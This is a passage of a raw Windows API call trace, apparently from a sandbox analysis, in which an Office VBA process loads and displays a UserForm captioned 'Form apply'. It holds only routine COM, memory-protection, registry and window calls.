dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1854ec | out: lpflOldProtect=0x1854ec*=0x40) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac819, dwSize=0x8) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac818, dwSize=0x8) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac828, dwSize=0x2) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.005] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac90c, dwSize=0x45) returned 1 [0042.005] VirtualProtect (in: lpAddress=0x6cac90c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1854ec | out: lpflOldProtect=0x1854ec*=0x40) returned 1 [0042.005] GetCurrentProcess () returned 0xffffffffffffffff [0042.005] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac994, dwSize=0x45) returned 1 [0042.005] VirtualProtect (in: lpAddress=0x6cac994, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1854ec | out: lpflOldProtect=0x1854ec*=0x40) returned 1 [0042.005] GetCurrentProcess () returned 0xffffffffffffffff [0042.005] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca11, dwSize=0x8) returned 1 [0042.005] GetCurrentProcess () returned 0xffffffffffffffff [0042.005] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca10, dwSize=0x8) returned 1 [0042.005] GetCurrentProcess () returned 0xffffffffffffffff [0042.005] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca20, dwSize=0x2) returned 1 [0042.005] GetCurrentProcess () returned 0xffffffffffffffff [0042.005] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca74, dwSize=0x45) returned 1 [0042.005] VirtualProtect (in: lpAddress=0x6caca74, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1854ec | out: lpflOldProtect=0x1854ec*=0x40) returned 1 [0042.005] GetCurrentProcess () returned 0xffffffffffffffff [0042.005] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacb5c, dwSize=0x45) returned 1 [0042.005] VirtualProtect (in: lpAddress=0x6cacb5c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1854ec | out: lpflOldProtect=0x1854ec*=0x40) returned 1 [0042.005] GetCurrentProcess () returned 0xffffffffffffffff [0042.005] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbd9, dwSize=0x8) returned 1 [0042.005] GetCurrentProcess () returned 0xffffffffffffffff [0042.005] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbd8, dwSize=0x8) returned 1 [0042.005] GetCurrentProcess () returned 0xffffffffffffffff [0042.005] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbe8, dwSize=0x2) returned 1 [0042.005] GetCurrentProcess () returned 0xffffffffffffffff [0042.005] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacc3c, dwSize=0x45) returned 1 [0042.005] VirtualProtect (in: lpAddress=0x6cacc3c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1854ec | out: lpflOldProtect=0x1854ec*=0x40) returned 1 [0042.005] GetCurrentProcess () returned 0xffffffffffffffff [0042.005] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caccc4, dwSize=0x45) returned 1 [0042.005] VirtualProtect (in: lpAddress=0x6caccc4, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1854ec | out: lpflOldProtect=0x1854ec*=0x40) returned 1 [0042.006] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186188 | out: ppvObject=0x186188*=0x0) returned 0x80004002 [0042.006] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186180 | out: ppvObject=0x186180*=0x0) returned 0x80004002 [0042.006] IUnknown:Release (This=0x6a6e948) returned 0x6 [0042.006] IUnknown:AddRef (This=0x6ccf078) returned 0x4 [0042.006] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186188 | out: ppvObject=0x186188*=0x0) returned 0x80004002 [0042.006] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186180 | out: ppvObject=0x186180*=0x0) returned 0x80004002 [0042.006] IUnknown:Release (This=0x6ccf078) returned 0x3 [0042.006] IUnknown:AddRef (This=0x6a6e9a8) returned 0x3 [0042.006] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186188 | out: ppvObject=0x186188*=0x0) returned 0x80004002 [0042.006] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186180 | out: ppvObject=0x186180*=0x0) returned 0x80004002 [0042.006] IUnknown:Release (This=0x6a6e9a8) returned 0x2 [0042.006] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186268 | out: ppvObject=0x186268*=0x0) returned 0x80004002 [0042.006] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186260 | out: ppvObject=0x186260*=0x0) returned 0x80004002 [0042.006] IUnknown:Release (This=0x6a6e8e8) returned 0x6 [0042.006] IUnknown:AddRef (This=0x6ceee08) returned 0x4 [0042.006] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186268 | out: ppvObject=0x186268*=0x0) returned 0x80004002 [0042.006] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186260 | out: ppvObject=0x186260*=0x0) returned 0x80004002 [0042.006] IUnknown:Release (This=0x6ceee08) returned 0x3 [0042.006] IUnknown:AddRef (This=0x6ceeeb8) returned 0x4 [0042.006] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186268 | out: ppvObject=0x186268*=0x0) returned 0x80004002 [0042.006] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186260 | out: ppvObject=0x186260*=0x0) returned 0x80004002 [0042.006] IUnknown:Release (This=0x6ceeeb8) returned 0x3 [0042.006] VarAdd (in: pvarLeft=0x6b7ede8, pvarRight=0x6b7edc0, pvarResult=0x6b7ed90 | out: pvarResult=0x6b7ed90) returned 0x0 [0042.007] VarAdd (in: pvarLeft=0x6b7ede8, pvarRight=0x6b7edc0, pvarResult=0x6b7ed90 | out: pvarResult=0x6b7ed90) returned 0x0 [0042.007] UserForm:IClassFactory:CreateInstance (in: This=0x7fee329e490, pUnkOuter=0x6c2d8e8, riid=0x7fee45c7890*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1861a0 | out: ppvObject=0x1861a0*=0x3c033c0) returned 0x0 [0042.007] UserForm:IUnknown:AddRef (This=0x3c033c0) returned 0x0 [0042.007] GetCurrentThreadId () returned 0x8c0 [0042.007] UserForm:IUnknown:AddRef (This=0x3c033c0) returned 0x0 [0042.007] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45c78b0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c2d8d0 | out: ppvObject=0x6c2d8d0*=0x3c03448) returned 0x0 [0042.007] GetCurrentThreadId () returned 0x8c0 [0042.007] strcpy_s (in: _Dst=0x185e40, _DstSize=0x114, _Src="VBInternal_Create:" | out: _Dst="VBInternal_Create:") returned 0x0 [0042.007] lstrcpyA (in: lpString1=0x185e52, lpString2="UserForm1" | out: lpString1="UserForm1") returned="UserForm1" [0042.007] GetCurrentThreadId () returned 0x8c0 [0042.007] GetCurrentThreadId () returned 0x8c0 [0042.007] CExposedDocFile::Stat () returned 0x0 [0042.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2749fbc, cbMultiByte=-1, lpWideCharStr=0x185cd0, cchWideChar=9 | out: lpWideCharStr="\x03VBFrame") returned 9 [0042.007] CExposedDocFile::OpenStream () returned 0x0 [0042.007] CExposedStream::Stat () returned 0x0 [0042.007] GlobalLock (hMem=0x6e50078) returned 0x3c28ae0 [0042.007] GlobalSize (hMem=0x6e50078) returned 0x200 [0042.007] CExposedStream::Read () returned 0x0 [0042.008] lstrcmpiA (lpString1="VERSION", lpString2="VERSION") returned 0 [0042.008] lstrcmpiA (lpString1="Begin", lpString2="Begin") returned 0 [0042.008] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x185d28 | out: pclsid=0x185d28*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0042.008] lstrcpynA (in: lpString1=0x185bd0, lpString2="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", iMaxLength=256 | out: lpString1="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}" [0042.008] lstrcpynA (in: lpString1=0x185ad0, lpString2="UserForm1", iMaxLength=256 | out: lpString1="UserForm1") returned="UserForm1" [0042.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x185bd0, cbMultiByte=-1, lpWideCharStr=0x1859a0, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0042.008] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x185a00 | out: pclsid=0x185a00*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0042.008] StringFromGUID2 (in: rguid=0x185a00*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f)), lpsz=0x3ea0b88, cchMax=256 | out: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0042.008] wsprintfA (in: param_1=0x185660, param_2="%s%s%s%s%s" | out: param_1="Clsid\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\Instance CLSID") returned 59 [0042.008] RegQueryValueA (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\Instance CLSID", lpData=0x185560, lpcbData=0x185550 | out: lpData="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpcbData=0x185550) returned 0x2 [0042.008] lstrlenA (lpString="UserForm1") returned 9 [0042.008] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="UserForm1") returned 0x10d629 [0042.008] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 0x10a0c6 [0042.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x185bd0, cbMultiByte=-1, lpWideCharStr=0x1859d0, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0042.008] IIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpiid=0x185a20 | out: lpiid=0x185a20) returned 0x0 [0042.008] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 0x10a0c6 [0042.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x185bd0, cbMultiByte=-1, lpWideCharStr=0x185960, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0042.008] IIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpiid=0x1859b0 | out: lpiid=0x1859b0) returned 0x0 [0042.008] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="UserForm1") returned 0x10d629 [0042.009] GetCurrentThreadId () returned 0x8c0 [0042.009] lstrcmpiA (lpString1="Begin", lpString2="Caption") returned -1 [0042.009] lstrcmpiA (lpString1="End", lpString2="Caption") returned 1 [0042.009] lstrcpynA (in: lpString1=0x1858f0, lpString2="Caption", iMaxLength=261 | out: lpString1="Caption") returned="Caption" [0042.009] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Caption") returned 0x107810 [0042.009] lstrcmpiA (lpString1="Caption", lpString2="Caption") returned 0 [0042.009] lstrcmpiA (lpString1="Begin", lpString2="ClientHeight") returned -1 [0042.009] lstrcmpiA (lpString1="End", lpString2="ClientHeight") returned 1 [0042.009] lstrcpynA (in: lpString1=0x1858f0, lpString2="ClientHeight", iMaxLength=261 | out: lpString1="ClientHeight") returned="ClientHeight" [0042.009] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientHeight") returned 0x107da9 [0042.009] lstrcmpiA (lpString1="ClientHeight", lpString2="ClientHeight") returned 0 [0042.009] lstrcpynA (in: lpString1=0x4de7f00, lpString2="3855", iMaxLength=261 | out: lpString1="3855") returned="3855" [0042.009] atof (_String="3855") returned 0x27412f0 [0042.009] lstrcmpiA (lpString1="Begin", lpString2="ClientLeft") returned -1 [0042.009] lstrcmpiA (lpString1="End", lpString2="ClientLeft") returned 1 [0042.009] lstrcpynA (in: lpString1=0x1858f0, lpString2="ClientLeft", iMaxLength=261 | out: lpString1="ClientLeft") returned="ClientLeft" [0042.010] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientLeft") returned 0x104925 [0042.010] lstrcmpiA (lpString1="ClientLeft", lpString2="ClientLeft") returned 0 [0042.010] lstrcpynA (in: lpString1=0x4de7f00, lpString2="45", iMaxLength=261 | out: lpString1="45") returned="45" [0042.010] atof (_String="45") returned 0x27412f0 [0042.010] lstrcmpiA (lpString1="Begin", lpString2="ClientTop") returned -1 [0042.010] lstrcmpiA (lpString1="End", lpString2="ClientTop") returned 1 [0042.010] lstrcpynA (in: lpString1=0x1858f0, lpString2="ClientTop", iMaxLength=261 | out: lpString1="ClientTop") returned="ClientTop" [0042.010] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientTop") returned 0x109869 [0042.010] lstrcmpiA (lpString1="ClientTop", lpString2="ClientTop") returned 0 [0042.010] lstrcpynA (in: lpString1=0x4de7f00, lpString2="330", iMaxLength=261 | out: lpString1="330") returned="330" [0042.010] atof (_String="330") returned 0x27412f0 [0042.010] lstrcmpiA (lpString1="Begin", lpString2="ClientWidth") returned -1 [0042.010] lstrcmpiA (lpString1="End", lpString2="ClientWidth") returned 1 [0042.010] lstrcpynA (in: lpString1=0x1858f0, lpString2="ClientWidth", iMaxLength=261 | out: lpString1="ClientWidth") returned="ClientWidth" [0042.010] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientWidth") returned 0x1028e4 [0042.010] lstrcmpiA (lpString1="ClientWidth", lpString2="ClientWidth") returned 0 [0042.010] lstrcpynA (in: lpString1=0x4de7f00, lpString2="8550", iMaxLength=261 | out: lpString1="8550") returned="8550" [0042.010] atof (_String="8550") returned 0x27412f0 [0042.010] lstrcmpiA (lpString1="Begin", lpString2="StartUpPosition") returned -1 [0042.010] lstrcmpiA (lpString1="End", lpString2="StartUpPosition") returned -1 [0042.010] lstrcpynA (in: lpString1=0x1858f0, lpString2="StartUpPosition", iMaxLength=261 | out: lpString1="StartUpPosition") returned="StartUpPosition" [0042.010] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="StartUpPosition") returned 0x10fb67 [0042.010] lstrcmpiA (lpString1="StartUpPosition", lpString2="StartUpPosition") returned 0 [0042.010] lstrcpynA (in: lpString1=0x4de7f00, lpString2="1", iMaxLength=261 | out: lpString1="1") returned="1" [0042.011] lstrcmpiA (lpString1="Begin", lpString2="TypeInfoVer") returned -1 [0042.011] lstrcmpiA (lpString1="End", lpString2="TypeInfoVer") returned -1 [0042.011] lstrcpynA (in: lpString1=0x1858f0, lpString2="TypeInfoVer", iMaxLength=261 | out: lpString1="TypeInfoVer") returned="TypeInfoVer" [0042.011] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="TypeInfoVer") returned 0x107334 [0042.011] lstrcmpiA (lpString1="TypeInfoVer", lpString2="TypeInfoVer") returned 0 [0042.011] lstrcpynA (in: lpString1=0x4de7f00, lpString2="83", iMaxLength=261 | out: lpString1="83") returned="83" [0042.011] lstrcmpiA (lpString1="Begin", lpString2="End") returned -1 [0042.011] lstrcmpiA (lpString1="End", lpString2="End") returned 0 [0042.011] lstrlenA (lpString="Form apply") returned 10 [0042.011] lstrlenA (lpString="Thunder") returned 7 [0042.011] lstrcpyA (in: lpString1=0x185700, lpString2="Thunder" | out: lpString1="Thunder") returned="Thunder" [0042.011] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x1856d0 | out: lpmi=0x1856d0) returned 1 [0042.011] CreateWindowExA (dwExStyle=0x40001, lpClassName=0xc1ad, lpWindowName="Form apply", dwStyle=0x80c80080, X=-5, Y=-8, nWidth=586, nHeight=295, hWndParent=0x101bc, hMenu=0x0, hInstance=0x7fee4230000, lpParam=0x0) returned 0x2023e [0042.011] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x81, wParam=0x0, lParam=0x184ff0) returned 0x1 [0042.011] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x83, wParam=0x0, lParam=0x185040) returned 0x0 [0042.012] GetSystemMenu (hWnd=0x2023e, bRevert=0) returned 0x20219 [0042.013] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x1, wParam=0x0, lParam=0x184fd0) returned 0x0 [0042.013] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x5, wParam=0x0, lParam=0x101023a) returned 0x0 [0042.013] IsZoomed (hWnd=0x2023e) returned 0 [0042.013] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x3, wParam=0x0, lParam=0x160003) returned 0x0 [0042.013] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001e4) returned 1 [0042.013] lstrcmpiA (lpString1="Begin", lpString2="End") returned -1 [0042.013] UserForm:IUnknown:AddRef (This=0x3c033c0) returned 0x0 [0042.013] UserForm:IUnknown:Release (This=0x3c033c0) returned 0x0 [0042.013] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45e3320*(Data1=0xcf51ed10, Data2=0x62fe, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x86, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x3, [6]=0x48, [7]=0x36)), ppvObject=0x185c20 | out: ppvObject=0x185c20*=0x6bc2ea0) returned 0x0 [0042.013] MulDiv (nNumber=2540, nNumerator=8, nDenominator=96) returned 212 [0042.014] MulDiv (nNumber=2540, nNumerator=8, nDenominator=96) returned 212 [0042.014] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45e3310*(Data1=0xb196b288, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x185be0 | out: ppvObject=0x185be0*=0x6bc2d20) returned 0x0 [0042.014] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45d8a60*(Data1=0x10a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x185b48 | out: ppvObject=0x185b48*=0x6bc2d20) returned 0x0 [0042.014] CExposedDocFile::AddRef () returned 0x4 [0042.014] CExposedDocFile::AddRef () returned 0x3 [0042.015] CExposedDocFile::OpenStream () returned 0x0 [0042.015] CExposedStream::AddRef () returned 0x2 [0042.015] CExposedStream::Release () returned 0x1 [0042.015] CExposedStream::Seek () returned 0x0 [0042.015] CExposedDocFile::OpenStream () returned 0x0 [0042.015] CExposedStream::AddRef () returned 0x2 [0042.015] CExposedStream::Release () returned 0x1 [0042.016] CExposedStream::Seek () returned 0x0 [0042.016] CExposedStream::Seek () returned 0x0 [0042.020] CExposedStream::Seek () returned 0x0 [0042.020] CExposedStream::Release () returned 0x0 [0042.020] CExposedStream::Release () returned 0x0 [0042.021] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45e1b50*(Data1=0x5efc7970, Data2=0x14bc, Data3=0x11cf, Data4=([0]=0x9b, [1]=0x2b, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x38, [7]=0x19)), ppvObject=0x4de8e58 | out: ppvObject=0x4de8e58*=0x6bc2ea0) returned 0x0 [0042.022] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45e08e0*(Data1=0x468cfb80, Data2=0xb4f9, Data3=0x11cf, Data4=([0]=0x80, [1]=0xdd, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x61, [6]=0x48, [7]=0x95)), ppvObject=0x185ce8 | out: ppvObject=0x185ce8*=0x6bc2d20) returned 0x0 [0042.022] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45c78b0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x185d20 | out: ppvObject=0x185d20*=0x3c03448) returned 0x0 [0042.022] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45c78b0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x185d20 | out: ppvObject=0x185d20*=0x3c03448) returned 0x0 [0042.023] GetWindowLongA (hWnd=0x2023e, nIndex=-20) returned 262401 [0042.023] SetWindowLongA (hWnd=0x2023e, nIndex=-20, dwNewLong=262401) returned 262401 [0042.023] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x7c, wParam=0xffffffffffffffec, lParam=0x185cd0) returned 0x0 [0042.023] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x7d, wParam=0xffffffffffffffec, lParam=0x185cd0) returned 0x0 [0042.024] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0042.024] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0042.024] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0042.024] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45e3310*(Data1=0xb196b288, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x185d30 | out: ppvObject=0x185d30*=0x6bc2d20) returned 0x0 [0042.024] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45e1f20*(Data1=0x112, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x185c38 | out: ppvObject=0x185c38*=0x6bc2d20) returned 0x0 [0042.025] IsWindow (hWnd=0x20240) returned 1 [0042.025] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x210, wParam=0x1, lParam=0x20240) returned 0x0 [0042.025] GetCurrentThreadId () returned 0x8c0 [0042.025] CExposedStream::Commit () returned 0x0 [0042.025] CExposedStream::Release () returned 0x0 [0042.025] GlobalHandle (pMem=0x3c28ae0) returned 0x6e50078 [0042.025] GlobalUnlock (hMem=0x6e50078) returned 0 [0042.025] UserForm:IUnknown:AddRef (This=0x3c033c0) returned 0x0 [0042.025] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45e08e0*(Data1=0x468cfb80, Data2=0xb4f9, Data3=0x11cf, Data4=([0]=0x80, [1]=0xdd, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x61, [6]=0x48, [7]=0x95)), ppvObject=0x1860d0 | out: ppvObject=0x1860d0*=0x6bc2d20) returned 0x0 [0042.025] UserForm:IUnknown:Release (This=0x3c033c0) returned 0x0 [0042.026] IConnectionPoint:Advise (in: This=0x6c12e28, pUnkSink=0x6c2d910, pdwCookie=0x186098 | out: pdwCookie=0x186098*=0xffffffff) returned 0x0 [0042.026] UserForm:IUnknown:Release (This=0x6c12e28) returned 0x0 [0042.026] IConnectionPoint:Advise (in: This=0x6d26e58, pUnkSink=0x6c2d918, pdwCookie=0x186098 | out: pdwCookie=0x186098*=0xffffffff) returned 0x0 [0042.026] UserForm:IUnknown:Release (This=0x6d26e58) returned 0x0 [0042.026] IConnectionPoint:Advise (in: This=0x6d26e58, pUnkSink=0x6c2d920, pdwCookie=0x186098 | out: pdwCookie=0x186098*=0xffffffff) returned 0x0 [0042.026] UserForm:IUnknown:Release (This=0x6d26e58) returned 0x0 [0042.026] IConnectionPoint:Advise (in: This=0x6d26e58, pUnkSink=0x6c2d928, pdwCookie=0x186098 | out: pdwCookie=0x186098*=0xffffffff) returned 0x0 [0042.027] UserForm:IUnknown:Release (This=0x6d26e58) returned 0x0 [0042.027] IConnectionPoint:Advise (in: This=0x6d26e58, pUnkSink=0x6c2d930, pdwCookie=0x186098 | out: pdwCookie=0x186098*=0xffffffff) returned 0x0 [0042.027] UserForm:IUnknown:Release (This=0x6d26e58) returned 0x0 [0042.027] IConnectionPoint:Advise (in: This=0x6d26e58, pUnkSink=0x6c2d938, pdwCookie=0x186098 | out: pdwCookie=0x186098*=0xffffffff) returned 0x0 [0042.027] UserForm:IUnknown:Release (This=0x6d26e58) returned 0x0 [0042.027] IConnectionPoint:Advise (in: This=0x6d26e58, pUnkSink=0x6c2d940, pdwCookie=0x186098 | out: pdwCookie=0x186098*=0xffffffff) returned 0x0 [0042.027] UserForm:IUnknown:Release (This=0x6d26e58) returned 0x0 [0042.028] IConnectionPoint:Advise (in: 